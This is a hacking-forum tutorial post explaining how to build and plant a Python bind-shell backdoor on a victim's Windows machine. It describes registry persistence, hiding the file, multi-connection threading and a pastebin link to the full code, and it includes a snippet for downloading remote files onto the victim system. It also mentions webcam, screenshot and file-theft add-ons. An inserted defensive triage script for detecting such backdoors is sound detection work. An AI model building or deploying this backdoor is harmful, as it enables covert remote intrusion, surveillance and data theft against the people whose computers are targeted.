Hi guys, I'm gonna keep this short because I've got assignments and a lot of notes to study and also other how-tos and forums to read. lol... Since I'm keeping this short, no story time, just the scenario. And I want to thank n3stor for giving me the idea to post this.
Scenario
Let's say you have a target to hack and you want to be able to remotely access the victim (duh!). I think the most effective backdoor is the reverse shell because you get a connection no matter what! But what if someone finds it and reverse engineers it? You don't want them to know your IP address, and they will, even if you clear logs. With a bind shell you have to connect yourself, it is less likely that you will get in, and it is loud, but if you clear the logs, reverse engineering of the backdoor can't get you, so cool huh ;)
Import Modules and Maintain Access
So first, you have to import the modules that you will use for our backdoor.
- socket - for network connections
- thread - so you can get multiple connections
- subprocess - so you can run system commands
Now I am going to explain the subprocess calls. It assumes you run it from a USB:
- it copies the shell to the current user's directory
- adds the bind shell to the registry so it always runs on system startup
- hides the bind shell so it cannot be found easily
Main Program
This is where the whole main code is.
This part contains what happens after you have got a connection.
Now we don't want just anyone to be using our backdoor, so I added authentication to it. Didn't have time to change the username but feel free. And make sure you change it (don't want to be in trouble because of script kiddies... lol). And you can download more stuff with the wget there ;) ... lol, so anyway that's pretty much it, nothing much to it.
Persistence
This part of the code mainly makes sure that you will always be ready to receive a connection even if an error causes the socket to close.
It also creates a thread so that there can be more than one connection simultaneously (hope that makes sense!!). And obviously, there can only be a maximum of 5 connections. :D
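Seen from the defender's side, the traits described above (a copy in the user's directory, a registry startup entry, a hidden file, and a socket waiting for connections) can be correlated during host triage. The following is an added example, not part of the original post's code; the Run key location, the sample inventory, the file names and the port are constructed assumptions, since the post does not state them.

```python
import ntpath

RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"  # assumed location
USER_ROOT = "c:\\users\\"

# Constructed inventory for a hypothetical host (not data from the post).
AUTORUNS = [  # (registry key, value name, command line)
    (RUN_KEY, "OneDrive", r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    (RUN_KEY, "updater", r"C:\Users\alice\svchelper.exe"),
    (RUN_KEY, "notes", r'"C:\Users\alice\AppData\Local\Notes\notes.exe" --tray'),
]
HIDDEN_FILES = [r"C:\Users\alice\svchelper.exe"]  # files with the hidden attribute
LISTENERS = [  # (owning image, local address, TCP port)
    (r"C:\Windows\System32\svchost.exe", "0.0.0.0", 135),
    (r"C:\Users\alice\svchelper.exe", "0.0.0.0", 4444),
]


def image_path(command):
    """Return the normalised executable path of an autorun command line."""
    command = command.strip()
    if command.startswith('"'):
        path = command[1:].split('"', 1)[0]
    else:
        path = command.split(" ", 1)[0]
    return ntpath.normcase(ntpath.normpath(path))


def triage(autoruns, hidden_files, listeners):
    """Flag autorun entries that match at least two of the three traits."""
    hidden = {ntpath.normcase(p) for p in hidden_files}
    listening = {}
    for image, addr, port in listeners:
        listening.setdefault(ntpath.normcase(image), []).append((addr, port))
    findings = []
    for _key, name, command in autoruns:
        path = image_path(command)
        reasons = []
        if path.startswith(USER_ROOT):
            reasons.append("autorun target in user profile")
        if path in hidden:
            reasons.append("target file is hidden")
        for addr, port in listening.get(path, []):
            if addr not in ("127.0.0.1", "::1"):  # loopback is not remotely reachable
                reasons.append("listens on %s:%d" % (addr, port))
        if len(reasons) >= 2:
            findings.append((name, path, reasons))
    return findings
```

Requiring two traits keeps ordinary per-user applications that start from the profile directory out of the findings; only the entry that is also hidden and listening is reported.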
Conclusion
So that is pretty much it. I added more functionality to the improved one I have, like download and upload of files from and to the victim's computer, webcam and screenshot. They are not too difficult so I'm sure you can figure that out for yourself. Well, happy hacking folks. And don't forget to check out n3stor's tutorial on the reverse shell.
I have pasted the code on pastebin
http://pastebin.com/GzZp6K7a
EDIT: Sorry for any typos or errors in my English. And also there is a mistake in the pastebin code post for the wget part of it.
    elif data.strip('\r\n').startswith('wget'):
        try:
            f = open(os.path.basename(data[5:]), "wb")
            f.write(urllib2.urlopen(data[5:]).read())
            f.close()
            conn.send("Successfully downloaded %s" % os.path.basename(data[5:]))
        except:
            conn.send("Download failed!")

I forgot the .read() function. I'm sorry.